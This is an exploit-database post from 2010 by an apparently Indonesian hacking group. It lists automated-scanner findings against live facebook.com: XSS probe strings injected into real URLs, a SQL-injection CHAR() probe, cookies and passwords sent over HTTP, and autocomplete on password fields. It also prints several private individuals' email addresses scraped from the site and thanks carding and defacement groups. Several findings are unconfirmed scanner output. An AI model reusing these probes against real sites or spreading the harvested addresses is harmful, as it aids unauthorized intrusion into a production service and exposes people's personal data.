============================= allow vulnerable facebook.com =============================
mc2_s3lector
[+] yogyacarderlink.web.id
[+] KeDaicomputerworks.org (makassar)
[+] [2010-04-06]

----------------------------------------------------------------------------------------------------
facebook german
----------------------------------------------------------------------------------------------------
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by altering the HTML on the fly to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

[Report]
Name : Query Based Parameter
Type : FullQueryString
Attack : '"-->
http://www.facebook.com/terms/provisions/german?'"-->

------------------------------------------------------------------------------------------------------
MITM attack 1
------------------------------------------------------------------------------------------------------
This cookie will be transmitted over an HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force the victim to make an HTTP request to steal the cookie.

[Report]
Cookie : reg_fb_ref
Name : nsextt
Type : Querystring
Attack Pattern : '"-->
https://login.facebook.com/alogin.php?gray=2&hash=95369428d067a9db6a3104d54c6b0187&oid=121759744510721

------------------------------------------------------------------------------------------------------
Xss
------------------------------------------------------------------------------------------------------
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Due to the content-type of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The content-type indicates that there is a possibility of exploitation by changing the attack; however, the scanner does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with automatic MIME sniffing such as Internet Explorer.

Vulnerable : http://www.facebook.com/contact_importer/ajax/importer.php
Name : ms_login_name
Type : Post
Attack : %27%22%20ns=mc2_s3lector(0x001069)%20

-------------------------------------------------------------------------------------------------------
MITM 2
-------------------------------------------------------------------------------------------------------
If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the form action to steal the user's password. Even though the target page is HTTPS, this does not protect the system against MITM attacks. This issue is important as it negates the use of SSL as a privacy protection barrier.

[report]
Vulnerable : http://www.facebook.com/ajax/
action : https://login.facebook.com/login.php?login_attempt=1

-------------------------------------------------------------------------------------------------------
identified that password data is sent over HTTP
-------------------------------------------------------------------------------------------------------
- identified that password data is sent over HTTP.
- If an attacker can intercept network traffic he/she can steal users' credentials.

Vulnerable : http://www.facebook.com//find-friends/?ref=pf
action : http://www.facebook.com/contact_importer/ajax/importer.php

-------------------------------------------------------------------------------------------------------
internal server
-------------------------------------------------------------------------------------------------------
The server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If the scanner is able to find a security issue in the same resource it will report this as a separate vulnerability.

[report]
Vulnerable URL : http://www.facebook.com/ajax/signup_dialog.php?page_id=(select CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))&next=/fbsitegovernance/posts/120701477944064
Name : page_id
Type : Querystring
Attack : (select+CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))

-------------------------------------------------------------------------------------------------------
pass
-------------------------------------------------------------------------------------------------------
- Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used on shared computers such as cyber cafes or airport terminals.
- "Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card" etc.

[report]
Vulnerable :
http://www.facebook.com///error.facebook.com//common//scribe_endpoint.php?c=si_clickjacking&m&t=4778
http://www.facebook.com/window.location.href'
http://www.facebook.com///b.static.ak.fbcdn.net//rsrc.php

-----------------------------------------------------------------------------------------------------------
Email address disclosure
-----------------------------------------------------------------------------------------------------------
E-mail addresses discovered within the application can be used by both spam email engines and brute force tools. Furthermore, valid email addresses may lead to social engineering attacks.

[report]
Vulnerable URL :
http://www.facebook.com/pages/explotar-burbujitas-de-plastico/31118267838
http://www.facebook.com//find-friends/?ref=pf
http://www.facebook.com/legal/copyright.php?howto_report
http://www.facebook.com/pages/I-need-a-vacation/72161599412
http://www.facebook.com/pages/Hot-Showers/88216396646

----> example found, E-mails: ip@facebook.com, weezyFOW@gmail.com, droopy_cf@live.com.ar, TE@WWW.VACATIONSUNSATION.GL, frajbargaoui@gmail.com

-------------------------------------------------------------------------------------------------------------
big thanks to:
- inj3ct0r.com (Inj3ct0r Exploit Database by r0073r)
- yogyacarderlink.web.id (v3n0m, lingga, z0mb13, my wisdom, setan muda, byebye, m4rc0, leqi, crackbox, & all)
- my family KeDai computerworks.com (fanzy kobandaha, hendry slank, mas william, wahdan, wandi rifaldi & all)
- the-codec stuff (0n3-d4y, hendry_slank, 4m-007, red naruto, cooln3tter)
- jasakom.com
- indonesian hacker
- indonesiandefacer
- indonesian like a coding
- STMIK dipanegara makassar

# Inj3ct0r.com [2010-05-15]